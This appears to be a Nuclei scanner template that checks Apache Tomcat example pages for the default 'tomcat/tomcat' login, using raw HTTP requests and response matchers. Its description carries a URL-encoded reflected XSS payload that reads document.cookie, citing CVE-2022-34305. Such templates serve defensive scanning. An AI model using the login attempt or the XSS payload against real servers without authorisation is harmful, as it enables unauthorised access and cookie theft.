id: tomcat-examples-login

info:
  name: Tomcat Examples Default Login
  author: 0xelkomy & C0NQR0R
  severity: info
  description: Default Creds and there is XSS here, /examples/jsp/security/protected/index.jsp?dataName=%22%3E%3Cimg+src%3Dd+onerror%3Dalert%28document.cookie%29%3E&dataValue= after you login you will be able to get it.
  reference:
    - https://c0nqr0r.github.io/CVE-2022-34305/
  metadata:
    verified: true
  tags: default-login,tomcat

requests:
  - raw:
      - |
        GET /examples/jsp/security/protected/index.jsp HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /examples/jsp/security/protected/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

    attack: pitchfork
    payloads:
      username:
        - tomcat
      password:
        - tomcat

    redirects: true
    max-redirects: 2
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You are logged in as remote user"
          - "{{username}}"
        condition: and